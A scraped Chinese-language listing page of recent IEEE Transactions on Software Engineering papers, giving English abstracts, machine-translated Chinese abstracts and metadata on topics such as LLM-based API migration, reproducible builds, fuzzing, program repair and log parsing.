首页 > 最新文献

IEEE Transactions on Software Engineering最新文献

英文 中文
Automated Update of Android Deprecated API Usages With Large Language Models 自动更新大型语言模型的Android弃用API用法
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-11-03 DOI: 10.1109/TSE.2025.3627897
Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang
Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs however are regularly updated to incorporate new features while the old APIs get deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, it is non-trivial to update the deprecated API usages. Therefore, the usages of deprecated APIs linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thoughts prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.
Android应用程序依赖于应用程序编程接口(api)来访问Android设备的各种功能。然而,这些api会定期更新以包含新特性,而旧的api会被弃用。尽管使用推荐的替代API更新已弃用的API用法的重要性已得到广泛认可,但更新已弃用的API用法也不是一件小事。因此,弃用的api在Android应用程序中仍然存在,并在实践中导致兼容性问题。本文介绍了GUPPY,这是一种利用大型语言模型(llm)更新Android已弃用API用法的自动化方法。通过使用精心制作的思维链提示,GUPPY利用最强大的llm之一GPT-4来更新废弃的API用法,确保新旧API级别的兼容性。此外,GUPPY使用GPT-4生成测试,识别不正确的更新,并通过迭代过程改进API的使用,直到测试通过或达到指定的限制。我们对来自20个已弃用API的360个基准API用法和来自最新API级别33和34的另外156个已弃用API用法进行了评估,证明了GUPPY优于最先进的技术。
{"title":"Automated Update of Android Deprecated API Usages With Large Language Models","authors":"Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang","doi":"10.1109/TSE.2025.3627897","DOIUrl":"10.1109/TSE.2025.3627897","url":null,"abstract":"Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs however are regularly updated to incorporate new features while the old APIs get deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, it is non-trivial to update the deprecated API usages. Therefore, the usages of deprecated APIs linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thoughts prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"70-85"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434090","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Causes and Canonicalization of Unreproducible Builds in Java Java中不可复制构建的原因和规范化
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-11-03 DOI: 10.1109/TSE.2025.3627891
Aman Sharma;Benoit Baudry;Martin Monperrus
The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using OSS-Rebuild and jNorm respectively. Finally, we present Chains-Rebuild (improvements to OSS-Rebuild), a tool that raises reproducibility success from 9.48% to 26.60% on 12,803 unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and Chains-Rebuild, a canonicalization tool for mitigating unreproducible builds in Java.
软件供应链的日益复杂和供应链攻击的增加提高了人们对软件完整性的关注。用户和涉众在验证给定的软件工件与其声明的源相对应时面临着重大的挑战。可复制构建通过确保从相同源代码独立执行的构建生成相同的二进制文件来解决这一挑战。然而,由于构建过程中的一系列不确定性因素和警告,实现大规模的可再现性仍然很困难,特别是在Java中。在这项工作中,我们主要关注基于java的软件(企业应用程序的原型)中的再现性。我们为可再现构建引入了一个概念框架,我们分析了来自reproducible Central的大型数据集,并对不可再现性的六个根本原因进行了新的分类。我们研究了可操作的缓解措施:分别使用OSS-Rebuild和jNorm进行工件和字节码规范化。最后,我们提出了chain - rebuild(对OSS-Rebuild的改进),这是一个将12,803个不可复制工件的再现成功率从9.48%提高到26.60%的工具。总而言之,我们的贡献是Java中构建不可再现性原因的第一个大规模分类,不可再现性构建的公开可用数据集,以及chain - rebuild,一个用于减轻Java中不可再现构建的规范化工具。
{"title":"Causes and Canonicalization of Unreproducible Builds in Java","authors":"Aman Sharma;Benoit Baudry;Martin Monperrus","doi":"10.1109/TSE.2025.3627891","DOIUrl":"10.1109/TSE.2025.3627891","url":null,"abstract":"The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using <sc>OSS-Rebuild</small> and <sc>jNorm</small> respectively. Finally, we present <sc>Chains-Rebuild</small> (improvements to <sc>OSS-Rebuild</small>), a tool that raises reproducibility success from 9.48% to 26.60% on <sc>12,803</small> unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and <sc>Chains-Rebuild</small>, a canonicalization tool for mitigating unreproducible builds in Java.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"54-69"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11223991","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434092","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Spatial Semantic Fuzzing for LiDAR-Based Autonomous Driving Perception Systems 基于激光雷达的自动驾驶感知系统空间语义模糊
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-31 DOI: 10.1109/TSE.2025.3627580
An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen
Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.
自动驾驶系统(ads)有潜力通过先进的感知和反应能力来提高安全性,通过缓解拥堵来减少排放,并有助于提高生活质量。尽管自动驾驶系统取得了重大进展,但由于自动驾驶感知模块的故障,已经发生了几起导致死亡的现实事故。作为自动驾驶汽车的关键组成部分,基于激光雷达的感知系统具有高复杂性和低可解释性的特点,因此需要开发有效的测试方法。目前的测试方法很大程度上依赖于人工数据收集和标记,这限制了它们检测各种错误行为的能力。这个过程不仅耗费时间和人力,而且还可能导致在测试期间反复发现类似的错误行为,从而阻碍对系统的全面评估。在本文中,我们提出并实现了一个基于激光雷达的自动驾驶感知系统的模糊测试框架,名为LDFuzz,该框架基于变形测试理论。这个框架为使用oracle信息自动生成测试提供了第一个统一的解决方案。为了提高测试效率和增加识别错误行为的测试数量,我们结合基于点云数据特征的空间覆盖和语义覆盖来指导生成过程。我们通过在四个基于激光雷达的自动驾驶感知系统上进行实验来评估LDFuzz的性能,这些系统专为3D物体检测任务而设计。实验结果表明,LDFuzz产生的测试可以有效地检测出基于lidar的感知系统中比最佳基线平均多7.5%的错误行为。此外,研究结果表明,LDFuzz显著提高了失败测试的多样性。
{"title":"Spatial Semantic Fuzzing for LiDAR-Based Autonomous Driving Perception Systems","authors":"An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen","doi":"10.1109/TSE.2025.3627580","DOIUrl":"10.1109/TSE.2025.3627580","url":null,"abstract":"Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"187-205"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412132","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
A Comprehensive Study of Bugs in Relational DBMS 关系型DBMS中bug的综合研究
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-31 DOI: 10.1109/TSE.2025.3625300
Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du
Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs—MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We have made 12 findings, which throw lights on the development, maintenance and testing of RDBMS systems. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, SQLT, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.
关系数据库管理系统(rdbms)是支持广泛应用程序的关键基础设施,因此在这些系统中减少bug至关重要。本研究首次全面分析了三种流行的开源rdbms——mysql、SQLite和openGauss中的bug。我们手动检查了四个维度上的777个bug,即bug的根本原因、bug症状、bug跨模块的分布以及所研究方面之间的相关性。我们还分析了触发错误的SQL语句,以发现现有工具无法生成的测试用例。我们有12个发现,这些发现为RDBMS系统的开发、维护和测试提供了启示。特别是,我们的发现揭示了与SQL数据类型和复杂特性(如数据库触发器、过程和数据库参数设置)相关的错误,为增强RDBMS错误检测和缓解提供了重要机会。利用这些见解,我们开发了一个工具SQLT,它有效地识别了8个RDBMS错误(5个与类型相关),所有这些都经过开发人员的验证,其中4个随后得到修复。
{"title":"A Comprehensive Study of Bugs in Relational DBMS","authors":"Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du","doi":"10.1109/TSE.2025.3625300","DOIUrl":"10.1109/TSE.2025.3625300","url":null,"abstract":"Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs—MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We have made 12 findings, which throw lights on the development, maintenance and testing of RDBMS systems. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, <sc>SQLT</small>, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3654-3668"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412135","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Directed Grammar-Based Test Generation 基于定向语法的测试生成
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-30 DOI: 10.1109/TSE.2025.3627220
Lukas Kirschner;Ezekiel Soremekun
Context: To effectively test complex software, it is important to generate goal-specific inputs, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goal(s) during testing – generate complex inputs or trigger new or error-prone behaviors. Problem: However, most state-of-the-art test generators are not designed to target specific goals. Notably, grammar-based test generators, which (randomly) produce syntactically valid inputs via an input specification (i.e., grammar) have a low probability of achieving an arbitrary testing goal. Aim: This work addresses this challenge by proposing an automated test generation approach (called FdLoop) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. Method: The main idea of our approach is to leverage test feedback to generate goal-specific inputs via a combination of evolutionary testing and grammar learning. FdLoop automatically learns a mapping between input structures and a specific testing goal, such mappings allow to generate inputs that target the goal-at-hand. Given a testing goal, FdLoop iteratively selects, evolves and learn the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize FdLoop for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions) and long execution time. We evaluate FdLoop using three (3) well-known input formats (JSON, CSS and JavaScript) and 20 open-source software. Results: In most (86%) settings, FdLoop outperforms all five tested baselines namely the baseline grammar-based test generators (random, probabilistic and inverse-probabilistic methods), EvoGFuzz and DynaMOSA. FdLoop is (up to) twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of FdLoop (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that FdLoop is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. Implications: Finally, our evaluation demonstrates that FdLoop effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.
上下文:为了有效地测试复杂的软件,重要的是生成目标特定的输入,即,实现特定测试目标的输入。例如,开发人员可能打算在测试期间瞄准一个或多个测试目标——生成复杂的输入或触发新的或容易出错的行为。问题:然而,大多数最先进的测试生成器并不是为特定的目标而设计的。值得注意的是,基于语法的测试生成器(通过输入规范(即语法)随机地产生语法上有效的输入)实现任意测试目标的概率很低。目的:这项工作通过提出一种自动化的测试生成方法(称为FdLoop)来解决这一挑战,该方法迭代地从现有的输入中学习相关的输入属性,以驱动目标特定输入的生成。方法:我们方法的主要思想是利用测试反馈,通过进化测试和语法学习的结合来生成特定目标的输入。FdLoop自动学习输入结构和特定测试目标之间的映射,这样的映射允许生成针对当前目标的输入。给定一个测试目标,FdLoop通过测试反馈和概率语法迭代地选择、发展和学习特定于目标的测试输入的输入分布。我们将FdLoop具体化为四个测试目标,即唯一的代码覆盖率、输入到代码的复杂性、程序失败(异常)和长执行时间。我们使用三(3)种众所周知的输入格式(JSON, CSS和JavaScript)和20个开源软件来评估FdLoop。结果:在大多数(86%)设置中,FdLoop优于所有五个测试基线,即基于语法的基线测试生成器(随机,概率和反概率方法),EvoGFuzz和DynaMOSA。在诱导错误行为方面,FdLoop(最多)是最佳基线(EvoGFuzz)的两倍(2X)。此外,我们表明FdLoop的主要组件(即输入mutator,语法mutator和测试反馈)对其有效性有积极的贡献。我们还观察到,FdLoop在不同的参数设置中都是有效的——初始种子输入的数量、生成的输入的数量、输入代的数量和不同的随机种子值。含义:最后,我们的评估表明,FdLoop有效地实现了单个测试目标(揭示错误的行为,生成复杂的输入,或诱导较长的执行时间),并扩展到多个测试目标。
{"title":"Directed Grammar-Based Test Generation","authors":"Lukas Kirschner;Ezekiel Soremekun","doi":"10.1109/TSE.2025.3627220","DOIUrl":"10.1109/TSE.2025.3627220","url":null,"abstract":"<bold>Context:</b> To effectively test complex software, it is important to generate <italic>goal-specific inputs</i>, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goal(s) during testing – generate complex inputs or trigger new or error-prone behaviors. <bold>Problem:</b> However, most state-of-the-art test generators are not designed to <italic>target specific goals.</i> Notably, grammar-based test generators, which (randomly) produce <italic>syntactically valid inputs</i> via an input specification (i.e., grammar) have a low probability of achieving an arbitrary testing goal. <bold>Aim:</b> This work addresses this challenge by proposing an automated test generation approach (called <sc>FdLoop</small>) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. <bold>Method:</b> The main idea of our approach is to leverage <italic>test feedback</i> to generate <italic>goal-specific inputs</i> via a combination of <italic>evolutionary testing</i> and <italic>grammar learning</i>. <sc>FdLoop</small> automatically learns a mapping between input structures and a specific testing goal, such mappings allow to generate inputs that target the goal-at-hand. Given a testing goal, <sc>FdLoop</small> iteratively selects, evolves and learn the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize <sc>FdLoop</small> for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions) and long execution time. We evaluate <sc>FdLoop</small> using three (3) well-known input formats (JSON, CSS and JavaScript) and 20 open-source software. <bold>Results:</b> In most (86%) settings, <sc>FdLoop</small> outperforms all five tested baselines namely the baseline grammar-based test generators (random, probabilistic and inverse-probabilistic methods), EvoGFuzz and DynaMOSA. <sc>FdLoop</small> is (up to) twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of <sc>FdLoop</small> (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that <sc>FdLoop</small> is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. <bold>Implications:</b> Finally, our evaluation demonstrates that <sc>FdLoop</small> effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3669-3691"},"PeriodicalIF":5.6,"publicationDate":"2025-10-30","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145404155","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
Computation Tree Logic Guided Program Repair 计算树逻辑引导程序修复
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-27 DOI: 10.1109/TSE.2025.3625772
Yu Liu;Yahui Song;Martin Mirchev;Abhik Roychoudhury
Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6%  on a CTL verification benchmark and 88.5%  on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7%  and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.
像计算树逻辑(CTL)这样的时间逻辑已经被广泛地用作表达形式来捕获丰富的行为规范。CTL可以表达诸如可达性、终止性、不变性和响应性等难以测试的特性。本文提出了一种基于CTL特性的无限状态程序自动修复机制。我们生成的补丁避免了在测试套件引导的修复中出现的过拟合问题,在这种情况下,修复的代码可能无法通过给定测试套件之外的测试。为了实现这一愿景,我们提出了一种基于Datalog的新型查找和修复框架,Datalog是一种广泛使用的用于程序分析的领域特定语言,它很容易通过分层否定来支持CTL的嵌套定点语义。具体来说,我们的框架将程序和CTL属性编码为Datalog事实和规则,并通过修改事实来执行修复以通过分析规则。在框架中,为了实现分析和修复结果,我们采用了现有的技术,包括循环总结和数据的符号执行(SEDL),并进行了关键修改。我们的方法在CTL验证基准和终止/响应基准上的分析准确率分别为56.6%和88.5%,分别超过了27.7%和76.9%的最佳基线性能。我们的方法修复所有检测到的错误,这是现有工具无法实现的。
{"title":"Computation Tree Logic Guided Program Repair","authors":"Yu Liu;Yahui Song;Martin Mirchev;Abhik Roychoudhury","doi":"10.1109/TSE.2025.3625772","DOIUrl":"10.1109/TSE.2025.3625772","url":null,"abstract":"Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6%  on a CTL verification benchmark and 88.5%  on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7%  and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"321-337"},"PeriodicalIF":5.6,"publicationDate":"2025-10-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11218954","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381252","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
引用次数: 0
SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing SemanticLog:迈向有效和高效的大规模语义日志解析
IF 5.6 1区 计算机科学 Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date : 2025-10-24 DOI: 10.1109/TSE.2025.3625121
Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou
Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents SemanticLog, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.
大型云系统的日志记录了各种各样的系统事件,从日常状态到关键错误。日志解析是将非结构化日志转换为结构化数据,便于管理和分析,是自动化日志分析的基础步骤。然而,现有的基于语法和基于深度学习的解析器很难处理复杂的真实日志。最近基于大型语言模型(llm)的解析器实现了更高的准确性,但它们通常依赖于在线api(例如,ChatGPT),这引起了隐私问题和网络延迟的困扰。此外,随着IT操作人工智能(AIOps)的兴起,专注于语法级模板的传统解析器无法捕获动态日志参数的语义,从而限制了它们对下游任务的有用性。这些挑战凸显了语义日志解析的必要性,这种解析超越了模板提取,需要理解参数语义。本文介绍了SemanticLog,一个由开源llm提供支持的高效的语义日志解析器。SemanticLog使llm的结构适应日志解析任务,利用llm丰富的知识,同时保护日志数据的隐私。它首先从日志数据中提取信息丰富的特征表示,然后通过细粒度的语义感知对其进行细化,从而实现准确的模板和参数提取以及语义类别预测。为了提高可伸缩性,SemanticLog引入了EffiParsing树,以便对大规模日志进行更快的推断。在LogHub-2.0数据集上进行的大量实验表明,SemanticLog在准确性方面明显优于最先进的日志解析器。此外,它还在效率上超越了现有的基于llm的解析器,同时展示了先进的语义解析能力。值得注意的是,与现有的基于llm的解析器(主要基于ChatGPT)相比,SemanticLog使用了更小的开源llm,同时保持了更好的日志数据隐私保护能力。
